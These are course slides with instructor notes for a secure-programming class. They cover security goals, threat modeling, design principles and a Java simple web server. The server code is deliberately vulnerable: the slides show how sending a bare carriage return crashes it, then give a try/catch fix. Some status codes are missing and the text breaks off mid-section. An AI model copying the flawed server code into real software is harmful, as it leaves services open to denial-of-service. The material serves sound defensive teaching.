CHAPTER 1 Security Goals

CHAPTER 1 Security Goals
Welcome to SEC103 on Secure Programming Techniques. In this course, I assume that you have some background in computer security, but now you want to put that background to use. For example, in the Computer Security Principles and Introduction To Cryptography courses, we cover topics such concerning trust and encryption. In this course, we put these principles into to practice, and I’ll show you have to write secure code that builds security into your applications from the ground up. Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita Kesavan (ISBN ; Except as otherwise noted, the content of this presentation is licensed under the Creative Commons 3.0 License.

Agenda Seven Key Security Concepts:
Authentication Authorization Confidentiality Data / Message Integrity Accountability Availability Non-Repudiation System Example: Web Client-Server Interaction

1.1. Security Is Holistic Physical Security Technological Security
Application Security Operating System Security Network Security Policies & Procedures All Three Required Physical Security: Badges. Must be checked. No piggybacking to be nice. Locks on doors. Screensavers with passwords. Technological Security: OS Security: Encrypted file systems for laptops. Application Security: Web server has no vulnerabilities Network Security: No unauthorized packets are allowed into your network. Policies and procedures: Dumpster diving – use paper shredding Guard against social engineering attacks (i.e., never tell your password to anyone, including a system administrator) Technological Security Policies and Procedures: Guard against social engineering attacks.

Physical Security Limit access to physical space to prevent asset theft and unauthorized entry Protecting against information leakage and document theft Ex: Dumpster Diving - gathering sensitive information by sifting through the company’s garbage Physical Security: Badges. Must be checked. No piggybacking to be nice. Locks on doors. Screensavers with passwords.

1.1.2. Technological Security (1) (Application Security)
No flaws in identity verification process Configure server correctly local files database content Interpret data robustly Web Server & Browser Example

1.1.2. Technological Security (2) (OS & Network Security)
Apps (e.g. servers) use OS for many functions OS code likely contains vulnerabilities Regularly download patches to eliminate (e.g. Windows Update for critical patches) Network Security: mitigate malicious traffic Tools: Firewalls & Intrusion Detection Systems

Policies & Procedures Ex: Social engineering attack - taking advantage of unsuspecting employees (e.g. attacker gets employee to divulge his username & password) Guard sensitive corporate information Employees need to be aware, be educated to be somewhat paranoid and vigilant

Security Concepts Authentication Authorization Confidentiality
Data / Message Integrity Accountability Availability Non-Repudiation Will illustrate each of these concepts through running examples…

Archetypal Characters
Alice & Bob – “good guys” Eve – a “passive” eavesdropper Mallory – an “active” eavesdropper Trent – trusted by Alice & Bob Bob Alice

1.2. Authentication Identity Verification
How can Bob be sure that he is communicating with Alice? Three General Ways: Something you know (i.e., Passwords) Something you have (i.e., Tokens) Something you are (i.e., Biometrics) (Phone call example… But what about ? Sender name could easily be “spoofed.”) Will provide one example of each general “way” to achieve authentication, and will provide more details on all “ways” in the section of the course on common attacks and defenses. Some security professionals distinguish between Identification and Authentication. Identification is the “public” part of the authentication process (entering username, or biometric scan). Authentication is the “private” part of the authentication process (entering password or PIN).

1.2.1. Something you KNOW Example: Passwords
Pros: Simple to implement Simple for users to understand Cons: Easy to crack (unless users choose strong ones) Passwords are reused many times One-time Passwords (OTP): different password used each time, but it is difficult for user to remember all of them One-time-passwords can be used to address the second “con.”

Something you HAVE OTP Cards (e.g. SecurID): generates new password each time user logs in Smart Card: tamper-resistant, stores secret information, entered into a card-reader Token / Key (i.e., iButton) ATM Card Strength of authentication depends on difficulty of forging Smart cards, ATM cards, and other tokens store “secrets.” (A “secret” is a sequence of bits, 0s and 1s, only know to the card/token and the system into which it is inserted.)

1.2.3. Something you ARE Biometrics Pros: “raises the bar”
Technique Effectiveness Acceptance Palm Scan 1 6 Iris Scan 2 Retinal Scan 3 7 Fingerprint 4 5 Voice Id Facial Recognition Signature Dynamics Biometrics Pros: “raises the bar” Cons: false negatives/positives, social acceptance, key management false positive: authentic user rejected false negative: impostor accepted Iris scan: camera take picture of iris features Retinal scan: beam of light projected into eye and scans retinal blood-vessel pattern. Eye put up to device, and puff of air blown into eye. Signature dynamics: physical motions (pressure/speed) translated into characteristic electrical signals that re unique to the person writing signature. Key management: user’s can’t get another thumbprint if their “key” is compromised! Other Cons: people change over time (my face may not be exactly the same over ten years) (See CISSP All-In-One page 131)

Final Notes Two-factor Authentication: Methods can be combined (i.e. ATM card & PIN) Who is authenticating who? Person-to-computer? Computer-to-computer? Three types (e.g. SSL): Client Authentication: server verifies client’s id Server Authentication: client verifies server’s id Mutual Authentication (Client & Server) Authenticated user is a “Principal” Methods can be combined: consider a typical ATM transaction. A user is authenticated based on something he/she HAS (the ATM card), and something he/she KNOWS (the PIN). Also called “two-factor” authentication.

1.3. Authorization Checking whether a user has permission to conduct some action Identity vs. Authority Is a “subject” (Alice) allowed to access an “object” (open a file)? Access Control List: mechanism used by many operating systems to determine whether users are authorized to conduct different actions In the ATM example, authorization asks the question (once the user John Doe has been authenticated), “Does John Doe have permission to withdraw $200?” It depends on the amount of money that John Doe has in his bank account (must be >= $200), and the amount of money that John has already withdrawn earlier today (most ATMs let a user take out a maximum of $300 per day). OSes use ACLs. Capabilities are another mechanism that can be used to implement authorization. (See backup slides at end of course.)

1.3.1. Access Control Lists (ACLs)
Set of three-tuples <User, Resource, Privilege> Specifies which users are allowed to access which resources with which privileges Privileges can be assigned based on roles (e.g. admin) Table 1-1. A Simple ACL User Resource Privilege Alice /home/Alice/* Read, write, execute Bob /home/Bob /* Mandatory: System decides which users have access to which objects (i.e. Bell-LaPadula: Unclassified, Confidential, Secret, Top Secret with No Read Up and No Write Down) Discretionary: Users decides who has access to objects they own Role-Based: System decides which users can access which objects based on their *role*.

1.3.2. Access Control Models ACLs used to implement these models
Mandatory: computer system decides exactly who has access to which resources Discretionary (e.g. UNIX): users are authorized to determine which other users can access files or other resources that they create, use, or own Role-Based (Non-Discretionary): user’s access & privileges determined by role

1.3.3. Bell-LaPadula Model Classifications: 3 Rules/Properties
Top Secret Secret Confidential Unclassified 3 Rules/Properties Simple property *-property (confinement) Tranquility property Basic Security Theorem: If the system starts in a secure state, and every state transition is secure, and the system will be secure after all transitions have been traversed. Simple property: can’t read data at a higher level (no read up) *-property: can’t write down (why? To prevent a Trojan horse executed by someone with a high classification to share data with a lower classification) Tranquility: security level of an object can’t be changed while it is being used Can be used to implement either mandatory or discretionary access control See for more info

1.4. Confidentiality Goal: Keep the contents of communication or data on storage secret Example: Alice and Bob want their communications to be secret from Eve Key – a secret shared between Alice & Bob Sometimes accomplished with Cryptography, Steganography, Access Controls, Database Views Confidentiality can be achieved through some sort of encryption with a “key” but can be achieved through other mechanisms as well.

1.5. Message/Data Integrity
Data Integrity = No Corruption Man in the middle attack: Has Mallory tampered with the message that Alice sends to Bob? Integrity Check: Add redundancy to data/messages Techniques: Hashing (MD5, SHA-1, …), Checksums (CRC…) Message Authentication Codes (MACs) Different From Confidentiality: A -> B: “The value of x is 1” (not secret) A -> M -> B: “The value of x is 10000” (BAD) A -> M -> B: “The value of y is 1” (BAD) Downloading security software is another example that illustrates the difference between confidentiality and message/data integrity. It is necessary to take distinct precautions to ensure data integrity even if communications are encrypted

1.6. Accountability Able to determine the attacker or principal
Logging & Audit Trails Requirements: Secure Timestamping (OS vs. Network) Data integrity in logs & audit trails, must not be able to change trails, or be able to detect changes to logs Otherwise attacker can cover their tracks Authentication + Signing in / out of a building creates accountability. Audit trail: a stored sequence of commands that a user issues at a computer terminal. Most existing logging/auditing security systems do not provide secure timestamping or data integrity – hence, an attacker can break into a system, and then change the logs to hid the fact that she was ever there!

1.7. Availability Uptime, Free Storage Solutions:
Ex. Dial tone availability, System downtime limit, Web server response time Solutions: Add redundancy to remove single point of failure Impose “limits” that legitimate users can use Goal of DoS (Denial of Service) attacks are to reduce availability Malware used to send excessive traffic to victim site Overwhelmed servers can’t process legitimate traffic Why is Availability a Security Goal? Consider this extreme case: a computer that is turned off is extremely secure (no one can hack into it), but it is unavailable and unusable.

1.8. Non-Repudiation Undeniability of a transaction
Alice wants to prove to Trent that she did communicate with Bob Generate evidence / receipts (digitally signed statements) Often not implemented in practice, credit-card companies become de facto third-party verifiers

1.9. Concepts at Work (1) PCs-R-US Bob DVD- Factory orders parts
B2B website Is DVD-Factory Secure?

Bob authenticates himself to DVD-Factory, Inc.
1.9. Concepts at Work (2) Availability: DVD-Factory ensures its web site is running 24-7 Authentication: Confidentiality: Bob’s browser and DVD-Factory web server set up an encrypted connection (lock on bottom left of browser) Bob authenticates himself to DVD-Factory, Inc. Encrypted Connection authenticates itself to Bob IS DVD-Factory Secure? This is actually a complicated question. Can break down and ask “Is DVD-Factory Available? Confidential? Etc”

1.9. Concepts at Work (3) Authorization: Message / Data Integrity:
DVD-Factory web site consults DB to check if Bob is authorized to order widgets on behalf of PCs-R-Us Message / Data Integrity: Checksums are sent as part of each TCP/IP packets exchanged (+ SSL uses MACs) Accountability: DVD-Factory logs that Bob placed an order for Sony DVD-R 1100 Non-Repudiation: Typically not provided w/ web sites since TTP req’d.

Summary Technological Security In Context Seven Key Security Concepts
DVD-Factory Example: Security Concepts at Work

CHAPTER 2 Secure Systems Design

Agenda Understanding Threats “Designing-In” Security
Convenience and Security Security By Obscurity Open vs. Closed Source A Game of Economics In the previous chapter, we covered a number of high-level requirements that more secure systems strive to provide. In this chapter, we will discuss a number of design principles that security architects typically keep in mind when building secure systems.

2.1. Understanding Threats
ID & Mitigate Threats Defacement Infiltration Phishing Pharming Insider Threats Click Fraud Denial of Service Data Theft/Loss

Defacement Online Vandalism, attackers replace legitimate pages with illegitimate ones Targeted towards political web sites Ex: White House website defaced by anti-NATO activists, Chinese hackers

Infiltration Unauthorized parties gain access to resources of computer system (e.g. CPUs, disk, network bandwidth) Could gain read/write access to back-end DB Ensure that attacker’s writes can be detected Different goals for different organizations Political site only needs integrity of data Financial site needs integrity & confidentiality

2.1.3. Phishing Attacker sets up spoofed site that looks real
Lures users to enter login credentials and stores them Usually sent through an with link to spoofed site asking users to “verify” their account info The links might be disguised through the click texts Wary users can see actual URL if they hover over link

Pharming Like phishing, attacker’s goal is to get user to enter sensitive data into spoofed website DNS Cache Poisoning – attacker is able to redirect legitimate URL to their spoofed site DNS translates URL to appropriate IP address Attacker makes DNS translate legitimate URL to their IP address instead and the result gets cached, poisoning future replies as well

Insider Threats Attacks carried out with cooperation of insiders Insiders could have access to data and leak it Ex: DB and Sys Admins usually get complete access Separation of Privilege / Least Privilege Principle Provide individuals with only enough privileges needed to complete their tasks Don’t give unrestricted access to all data and resources

2.1.6. Click Fraud Targeted against pay-per-click ads
Attacker could click on competitor’s ads Depletes other’s ad budgets, gains exclusive attention of legitimate users Site publishers could click on ads to get revenue Automated through malware such as botnets

2.1.7. Denial of Service (DoS)
Attacker inundates server with packets causing it to drop legitimate packets Makes service unavailable, downtime = lost revenue Particularly a threat for financial and e-commerce vendors Can be automated through botnets

2.1.8. Data Theft and Data Loss
Several Examples: BofA, ChoicePoint, VA BofA: backup data tapes lost in transit ChoicePoint: fraudsters queried DB for sensitive info VA: employee took computer with personal info home & his home was burglarized CA laws require companies to disclose theft/loss Even for encrypted data, should store key in separate media

Most Significant Threat
Threat Modeling Application Type Most Significant Threat Civil Liberties web site White House web site Defacement Financial Institution Electronic Commerce Compromise one or more accounts; Denial-of-Service Military Institution Infiltration; access to classified data Now that we have talked about of a few things that you should not do when attempting to secure an application, we are going to spend the remainder of this chapter talking about things that you should do to secure an application. The first step in figuring how when to spend your time securing your application is to do some threat modeling. The goal of building a threat model is to determine what the most significant threats to your application are. That is, you want to spend time thinking about what the bad guy is most interested in doing when it comes to your application. For example, if you are running a web site that is responsible for making political statements, or that represents a political figure, such as the ACLU web site or the White House web site, the bad guy is probably most interested in defacing your site in the hopes of promoting his or own political statement. On the other hand, if you are running the web site of a financial institution or an electronic commerce site, the bad guy is probably most interested in stealing valuable account or credit card numbers from your database. This is different than the case of the political web site, because it is probably OK for the information in the database that runs the political web site to be public, and we don’t mind if people get access to it so long as they cannot change/modify it. In the case of the financially-oriented web site, we DO mind if the attacker gets access to it. If the attacker is able to change or delete the account and credit card numbers but not read this information, this is less severe since we could always restore the information from a backup. (The customers of the web site might be slightly inconvenienced, but at least they won’t have to have their account and/or credit card numbers changed.) Electronic commerce sites are also faced with denial-of-service attacks as a highly significant threat. A denial-of-service attack is one in which the attacker is able to figure out a way to send so much data traffic to the web site, that the web site spends all its time servicing the requests from the attacker, and the requests of legitimate users cannot be answered. A denial-of-service attack is a significant threat for an electronic commerce web site because valuable revenue will be lost if the web site is not available to take orders from users. While a political web site might “lose face” if it suffers from a denial-of-service attack, there probably is not a direct loss in revenue that can be associated with the attack (unless, of course, the web site takes donations online!) Finally, military institutions are concerned with the leakage of classified information as their most significant threat. When assessing the security requirements for a new application, it is important to build a threat model. The types of attacks in the threat model will most likely guide the design of software that is used to secure the application.

2.2. Designing-In Security
Design features with security in mind Not as an afterthought Hard to “add-on” security later Define concrete, measurable security goals. Ex: Only certain users should be able to do X. Log action. Output of feature Y should be encrypted. Feature Z should be available 99.9% of the time Bad Examples: Windows 98, Internet If you are building a system that needs to be secure, it is important to think about security up-front as part of its design; that is, security should be designed in to the system from the start. Systems that are often built that meet a set of functionality and performance criteria, and software developers then attempt to make these systems secure only as an afterthought. That is the wrong way to design a system. Experience has shown that it is very hard to “add” on security onto a system only after it has been developed. For example, consider the design of the Windows 98 operating system (OS). Microsoft’s highest priority goals were to attempt to pack as much functionality into the OS, and deploy the software on time. Providing security and an access control mechanism was not among the primary design criteria as evidenced by many of the security holes in the product. For instance, the OS includes a feature that allows a PC to boot up into a “safe” or diagnostic mode without the entry of a username or password at all. A user may simply hit the F8 key as the boot sequence starts to have the PC boot up in this diagnostic mode, thereby bypassing the required entry of a username and password. The problem with this is that an attacker that gains physical access to the system could access the contents of the user’s entire disk by pressing the F8 key during the boot sequence. A better design of this feature that would have kept security in mind from the start would be to require the user to enter a username and password to enter the diagnostic mode. The only user that should indeed be authorized to boot up the PC in diagnostic mode and be given full access to the disk, etc. is the system administrator. Examples: F8 on Windows boot-up bypasses password entry and puts computer into diagnostic mode. TCP/IP – no accountability – free to send packets, and denial-of-service attacks occur because bad guys can send out many packets at no cost. Security added as afterthought usually results in a “turtle” architecture: hard outer shell, but very soft inside. Examples of concrete, measurable security goals: Only certain users should be authorized to use this feature This feature should be available 99.9% of the time (i.e. dial-tone) even under a denial-of-service attack 3) Information output by this feature should be encrypted 4) A log or audit trail should be kept every time this feature is used March 2002: .Net Server Ship Date delayed due to security vulnerabilities. Almost never happended bfore. Only could happen becasuse security was defined as part of the servers set of features. Security often requires architectural changes. Systems that “add-on” security later are like turtles. They might employ some type of hard shell that they add on the top of the system to defend it, but if an attacker can find a way around the shell, the system will be easy to attack. “Adding security later on” may require disabling newer features anyway, so why build features at all unless you build them secure to begin with. Securing an application later on may require significant changes (not using certain library functions such as strcpy), and changing things too late in the development of the application may introduce 1) risk, and 2) pressure to get the changes done before the deadline.

2.2.1. Windows 98 Diagnostic Mode:
Accessed through 'F8' key when booting Can bypass password protections, giving attacker complete access to hard disks & data Username/Password Security was added as an afterthought Should have been included at the start, then required it for entering diagnostic mode

The Internet All nodes originally university or military (i.e. trusted) since it grew out of DARPA With commercialization, lots of new hosts, all allowed to connect to existing hosts regardless of whether they were trusted Deployed Firewalls: allows host to only let in trusted traffic Loopholes: lying about IPs, using cleared ports

IP Whitelisting & Spoofing
IP Whitelisting: accepting communications only from hosts with certain IP addresses IP Spoofing attack: attacker mislabels (i.e. lies) source address on packets, slips past firewall Response to spoofing sent to host, not attacker Multiple communication rounds makes attack harder May DoS against legitimate host to prevent response

IP Spoofing & Nonces Nonce: one-time pseudo-random number
Attaching a nonce to a reply and requesting it to be echoed back can guard against IP spoofing Attacker won’t know what reply to fake Spoofing easier for non-connection-oriented protocols (e.g. UDP) than connection-oriented (e.g. TCP) TCP sequence #s should be random, o/w attacker can predict and inject packets into conversation

2.2.3. Turtle Shell Architectures
Inherently insecure system protected by another system mediating access to it Ex: Firewalls guard vulnerable systems within Ex: Death Star “strong outer defense” but vulnerable Hard outer shell should not be sole defense

2.3. Convenience and Security
Sometimes inversely proportional More secure → Less convenient Too Convenient → Less secure If too inconvenient → unusable → users will workaround → insecure Ex: users may write down passwords Good technologies increase both: relative security benefit at only slight inconvenience Until now, we have talked about how to pursue designing security for our systems. We must, however, acknowledge that security comes at a price to users. Typically, the more security technology that is deployed, the less convenient using a system becomes for users. For example, if we require our users to have passwords, and we allow our users to use any password they would like, then this might lead to security vulnerabilities since some users might choose passwords that are very easy to guess. On the other hand, if we assign complicated, hard-to-guess passwords to users, then our system will be more secure, but it will also be less convenient for users. Users may forget their passwords that we assign them. The interaction between security and convenience is not one way either. If the passwords that we assign are complicated enough, users might decide to write these passwords down (even if we tell them not to). Users might even write down their passwords in a place that a hacker might be able to access. Passwords written down in places that a hacker might find them could lead to an overall less secure system than if they were never written down anywhere at all. What this shows is that if a security policy is too inconvenient, users may do unexpected things (or just not listen to us), and we will end up with an overall insecure system anyhow. In summary, more security is usually more inconvenient, but more inconvenient does not mean more secure. A good security policy or technology will increase both security and convenience, but it is typically hard to achieve both. For example, if we were to allow users to choose their own passwords, but somehow “check” that their password is not “easy to guess,” and ask them to choose another one if it doesn’t satisfy our check, we will be achieving better security at the cost of hopefully only a minor inconvenience. (Requiring stronger passwords means that more users will have trouble selecting one. Think about examples of technologies that increase both convenience and security.)

2.4. Simple Web Server (SWS)
To illustrate what can go wrong if we do not design for security in our web applications from the start, consider a simple web server implemented in Java. Only serves documents using HTTP Walkthrough the code in the following slides

2.4.1. Hypertext Transfer Protocol (1)
HTTP is the communications protocol used to connect to servers on the Web Primary function is to establish a connection with a server & transmit HTML pages to client browsers or any other files required by an HTTP application. Website addresses begin with an prefix.

2.4.1. HTTP (2) Get / HTTP/1.0 HTTP/1.0 200 OK
A typical HTTP request that a browser makes to a web server: Get / HTTP/1.0 When the server receives this request for filename / (the root document on the web server), it attempts to load index.html. returns HTTP/ OK followed by the document contents.

SWS: main /* This method is called when the program is run from the command line. */ public static void main (String argv[]) throws Exception { /* Create a SimpleWebServer object, and run it */ SimpleWebServer sws = new SimpleWebServer(); sws.run(); } Now we walk through the code… Main() creates a SimpleWebServer object and calls its run() method. The run() method is just an infinite loop that waits for a connection from a client, and then attempts to process the request.

2.4.2. SimpleWebServer Object
public class SimpleWebServer { /* Run the HTTP server on this TCP port. */ private static final int PORT = 8080; /* The socket used to process incoming connections from web clients */ private static ServerSocket dServerSocket; public SimpleWebServer () throws Exception { dServerSocket = new ServerSocket (PORT); } public void run() throws Exception { while (true) { /* wait for a connection from a client */ Socket s = dServerSocket.accept(); /* then process the client's request */ processRequest(s); Here is the SimpleWebServer object. First we initialize a variable that holds the port number the web server should listen to for connections from clients. Then we initialize a ServerSocket. Socket: The method of directing data to the appropriate application in a TCP/IP network. The combination of the IP address of the station and a port number make up a socket. Think of this like an electrical socket. A web server and a web client both have a “virtual” power strip with many sockets on it. A web client can talk to a server by selecting one of its sockets, and then selecting a server socket and plugging a virtual wire into each end. The run() method has an infinite loop waiting for a connection from a client. The call to ServerSocket accept() returns a socket object that corresponds to a unique socket on the server. This allows the server to communicate with the client. Once the communication is established, the client’s request is processed.

2.4.2. SWS: processRequest (1)
/* Reads the HTTP request from the client, and responds with the file the user requested or a HTTP error code. */ public void processRequest(Socket s) throws Exception { /* used to read data from the client */ BufferedReader br = new BufferedReader (new InputStreamReader (s.getInputStream())); /* used to write data to the client */ OutputStreamWriter osw = new OutputStreamWriter (s.getOutputStream()); /* read the HTTP request from the client */ String request = br.readLine(); String command = null; String pathname = null; processRequest() takes the client socket as input. It uses this socket to create BufferedReader and OutputStreamWriter objects. Once these communication objects are created, the method attempts to read a line of input from the client using the BufferedReader. We expect this line of input to be an HTTP GET request (as discussed earlier).

2.4.2. SWS: processRequest (2)
/* parse the HTTP request */ StringTokenizer st = new StringTokenizer (request, " "); command = st.nextToken(); pathname = st.nextToken(); if (command.equals("GET")) { /* if the request is a GET try to respond with the file the user is requesting */ serveFile (osw,pathname); } else { /* if the request is a NOT a GET, return an error saying this server does not implement the requested command */ osw.write ("HTTP/ Not Implemented\n\n"); /* close the connection to the client */ osw.close(); The StringTokenizer object is used to break up the request into its constituent parts: GET, the pathname to the file the client would like to download. If the command is a “GET”, we call the serveFile() method, else we issue an error. Then we close the connection to the client.

SWS: serveFile (1) public void serveFile (OutputStreamWriter osw, String pathname) throws Exception { FileReader fr=null; int c=-1; StringBuffer sb = new StringBuffer(); /* remove the initial slash at the beginning of the pathname in the request */ if (pathname.charAt(0)=='/') pathname=pathname.substring(1); /* if there was no filename specified by the client, serve the "index.html" file */ if (pathname.equals("")) pathname="index.html"; The first “if” removes the initial slash at the beginning of the pathname, and the second “if” sets the file to be downloaded = index.html, if another file was not specified.

2.4.2. SWS: serveFile (2) /* try to open file specified by pathname */
fr = new FileReader (pathname); c = fr.read(); } catch (Exception e) { /* if the file is not found,return the appropriate HTTP response code */ osw.write ("HTTP/ Not Found\n\n"); return; Now the method attempts to open the file and read it into the web server’s memory. If the FileReader object is unable to open the file and read a byte from it, it issues an error message.

SWS: serveFile (3) /* if the requested file can be successfully opened and read, then return an OK response code and send the contents of the file */ osw.write ("HTTP/ OK\n\n"); while (c != -1) { sb.append((char)c); c = fr.read(); } osw.write (sb.toString()); If the file was successfully opened, send the HTTP/ OK message and then the method enters a while loop that reads bytes from the file and appends them to a StringBuffer, until the end of the file is reached. Then this StringBuffer is sent to the client.

2.5. Security in Software Requirements
Robust, consistent error handling Share reqs w/ QA team Handle internal errors securely – don’t provide error messages to potential attackers! Validation and Fraud Checks “Security or Bust” Policy

2.5.1. Specifying Error Handling Requirements
Vulnerabilities often due to bad error handling Example: DoS on SWS – makes it unavailable Just send a carriage return as the first message instead of a properly formatted GET message… Causes exception when breaking into tokens

2.5.1. DoS on SWS Example processRequest():
/* read the HTTP request from the client */ String request = br.readLine(); // empty string String command = null; String pathname = null; /* parse the HTTP request */ StringTokenizer st = new StringTokenizer (request, " "); command = st.nextToken(); // EXCEPTION: no tokens! /* SERVER CRASHES HERE – DENIAL OF SERVICE! */ pathname = st.nextToken(); Trace the code, assuming a CR sent from the client. We read the line of input from the client. When we tokenize, the line: command = st.nextToken(); results in an exception. Control is returned to run() which does not handle the exception; then control is returned to main() which does not handle the exception either. Java terminates the application.

How Do We Fix This? The web server should immediately disconnect from any web client that sends a malformed HTTP request to the server. The programmer needs to carefully handle exceptions to deal with malformed requests. Solution: Surround susceptible String Tokenizing code with try/catch block.

2.5.1. Try/Catch Solution /* read the HTTP request from the client */
String request = br.readLine(); String command = null; String pathname = null; try { /* parse the HTTP request */ StringTokenizer st = new StringTokenizer (request, " "); command = st.nextToken(); pathname = st.nextToken(); } catch (Exception e) { osw.write (“HTTP/ Bad Request\n\n”); osw.close(); return; } Close the connection to the client, rather than crash the server…

2.5.2. Sharing Requirements with Quality Assurance (QA)
Both dev & testers should get requirements Should have test cases for security too: Does it malfunction when provided bad input? Ping-of-Death: sending a packet of data can cause server to crash Ex: DoS attack on SimpleWebServer Ex: Nokia GGSN crashes on packet with TCP option field set to 0xFF

2.5.3. Handling Internal Errors Securely
Error messages and observable behavior can tip off an attacker to vulnerabilities Fault Injection: Providing a program with input that it does not expect (as in the DoS attack against SimpleWebServer) and observing its behavior “Ethical” hackers often hired to find such bugs

2.5.4. Including Validation and Fraud Checks
Requirements should specify which error cases & threats to handle Credit Card Example: Mod 10 Checksum: ensures validity of number, to catch user typos CVC: guards against fraudsters who have stolen # but don’t know the CVC Full Credit Card Check might be too costly

2.5.5. Writing Measurable Security Requirements
Access Control Security: Only certain users can do certain functions Auditing: Maintain log of users’ sensitive actions Confidentiality: encrypt certain functions’ output Availability: Certain features should be available almost always Include these requirements in design docs!

2.5.6. Security or Bust Should not ship code unless its secure
Advantage gained by launching earlier could be lost due to vulnerabilities that tarnish brand and lead to lost revenue Ex: Microsoft delayed ship of .NET server in ’02 because security requirements not met by “code freeze” deadline

2.6. Security by Obscurity Trying to be secure by hiding how systems and products work (to prevent info from being used by attacker) Ex: Military uses Need to Know basis Maybe necessary, but not sufficient to prevent determined attackers

2.6.1. Flaws in the Approach What assumptions to make about adversary?
Knows algorithms? Or not? Algorithms in “binary” secret? Attackers can probe for weaknesses reverse engineer exes observe behavior in normal vs. aberrant conds. (use fault injection) Fuzzing: systematically trying different input strings to find an exploit blackmail insiders Now that we have added security requirements to the requirements documents of our information systems, let talk about how we should go about implementing mechanisms that enforce those security requirements. Many organizations practice “security by obscurity.” That is, they attempt to keep things secure by keeping them secret. For example, companies keep many trade secrets, and sometimes don’t even tell their customers how their products work. Military organizations only disseminate information to people on a “need to know” basis. In both these cases, an organization is trying to keep information secure by hiding it from others. While it is possible to achieve some level of security by hiding information, that is, through obscurity, it may not always make sense to assume that an attacker does not know how the system works. For example, one might assume that a user might not be able to understand how a program works because it is deployed as an executable binary file (i.e., a .exe file). However, an attacker can easily disassemble, decompile, or reverse engineer the executable. Also, the attacker could derive information about how the program functions simply by observing its behavior under normal conditions, and/or its behavior on inputs that the attacker selects. (Can we come up with a simple example?) In addition to the technical approaches above, the attacker may also potentially be able to blackmail or coerce those that do know how the system works into disclosing details about how it works. To be conservative, we may therefore want to assume that the attacker knows exactly how the system to be attacked works. As such, we may want to avoid practicing security by obscurity if a better option exists. In the following, we will talk about how it may be possible to build a secure system whose design could be public knowledge, where the security of the system does not depend upon hiding design details, but instead depends on certain “keys” being secret. By “keys” we mean relatively short sequences of bits (i.e bit keys). It is usually much easier to keep a few “keys” secret compared to keeping all of the information about how a system functions secret. Interesting article about the topic at:

Secret Keys Kerckhoffs’ doctrine (1883): “The method used to encipher data is known to the opponent, and that security must lie in the choice of key.” assume the worst case! obscurity alone is not sufficient Compromised key can be changed without re-designing system. Key is easier to keep secret The concept of assuming that the attacker knows how the system functions, and that the security of the system should be dependent upon a “key” goes back to Kerckhoffs’ doctrine in We will see various algorithms whose details are completely public, yet secure in the next chapters on applied cryptography. For now, just keep in mind that hiding the details of how your system works does not typically provide an acceptable level of security. In fact, if the design of a system is not reviewed by a third-party, it is more likely than not that it will contain security holes that the original designer did not conceive of but that will be relatively obvious to third parties. (This is true unless, of course, the original designer is an experienced, expert cryptographer!)

SWS Obscurity Just distributing Java bytecode of SWS (and not source code) not enough security Can be disassembled or decompiled (e.g. Mocha, Jad) to produce rough source code Even disassembling can reveal the DoS exploit of the vulnerable tokenization process

2.6.2. Disassembling SWS public void processRequest(java.net.Socket);
throws java/lang/Exception Code: 0: new 25; //class BufferedReader 3: dup 4: new 26; //class InputStreamReader 7: dup 8: aload_1 9: invokevirtual 27; 12: invokespecial 28; 15: invokespecial 29; 18: astore_2 19: new 30; //class OutputStreamWriter 22: dup 23: aload_1 24: invokevirtual 31; 27: invokespecial 32; 30: astore_3 31: aload_2 32: invokevirtual 33; 35: astore 4 37: aconst_null 38: astore 5 40: aconst_null 41: astore 6 43: new 34; //class StringTokenizer 46: dup 47: aload 4 49: ldc 35; //String 51: invokespecial 36; 54: astore 7 56: aload 7 58: invokevirtual 37; 61: astore 5 63: aload 7 65: invokevirtual 37; 68: astore 6 70: aload 5 72: ldc 38; //String GET 74: invokevirtual 39; 77: ifeq 90 80: aload_0 81: aload_3 82: aload 6 84: invokevirtual 40; 87: goto 90: aload_3 91: ldc 41; 93: invokevirtual 42; 96: goto 101 99: astore 8 101: aload_3 102: invokevirtual 44; 105: return

2.6.3. Things to Avoid Don’t “invent” your own encryption algorithm!
Don’t embed keys in software! Nor in Windows Registry which is readable by all Don’t Forget Code Reuse: reuse well-tested software known to be reliably secure instead of doing same thing from scratch The idea of not providing security through obscurity entails many rules of thumb that one should keep in mind when designing secure systems. Here, we state a few such rules of thumbs, and examples of things that designers should stay away from. For instance, Systems designers should not attempt to “invent” their own algorithms for encryption. Designing encryption algorithms is a tricky and challenging business that should be left to cryptographers. If someone does decide to invent a new encryption algorithm, they should keep in mind that it will not be secure simply because no one else knows how it works. A good cryptography can take advantage of modern cryptanalytic techniques to break the security of most ad-hoc developed encryption schemes. If one does decide to attempt to invent a new encryption algorithm, the design of the algorithm should be reviewed by others, and should be reviewed by the community of cryptographers. The security of a good encryption scheme should be dependent on well-chosen secret keys, not on the obscurity of the algorithm itself. In addition, it is not recommended that one develop new implementations of existing encryption algorithms. Coming up with new encryption algorithms that are secure is hard, and getting the implementation of a cryptographic algorithm (new or old) is just as hard. A slight bug in the implementation of an encryption algorithm can be the door to a serious security hole. There are many well-known implementations of encryption algorithms (we will cover some of these later in the course), and a system designer should opt to re-use an existing, tested implementation that has already been looked over and tested by many smart people. While re-use of software is generally a good idea, it is an especially good idea when it comes to encryption and other cryptographic algorithms. Another rule of thumb that can be derived from the fact that security by obscurity is typically not good security is that one should not, whenever possible, attempt to embed secret keys in software. Keep in mind that software is compiled into binary code, and can be disassembled, decompiled, and/or reverse engineered. Secret keys will not stay secret simply because binary files are “hard to read.” In fact, a good secret key is typically a random sequence of bits while binary code that contains machine instructions often have predictable patterns. So, if you attempt to “hide” a secret key in a binary executable, it will probably exhibit more randomness (entropy) than the rest of the code. As a result, an encryption key buried in a binary executable can be easily discerned if it is a good key (is a random sequence of bits), and is sufficiently long (another property of a good key). So, the moral of the story is that secret keys should not be stored in program code if possible. A secure program will not attempt to achieve security by simply storing secret information in “hard to reach” places. For instance, some programs attempt to protect secret information by storing it in the Windows Registry. The Windows Registry is a part of the Windows operating system that applications can use to store configuration information. Most users of Windows PCs do not know how to read the information in the registry, but hackers (attackers) certainly will. A program that attempts to store a password in the Windows Registry in hopes of keeping the password secret is doomed to be hacked. A hacker can simply run the “regedit” command on the Windows prompt or use the Windows API to read the password out of the registry. So, if information is to be stored in the Windows Registry for security purposes, it should be encrypted. Of course, based on our prior rule of thumb, the encryption key should not be stored in a susceptible location (such as the program that uses the key) either. The encryption key should ideally be derived from password that the end-user does not write down anywhere, and only enters into the program that needs to use it whenever necessary.

2.7. Open vs. Closed Source “Is open-source software secure?” Open:
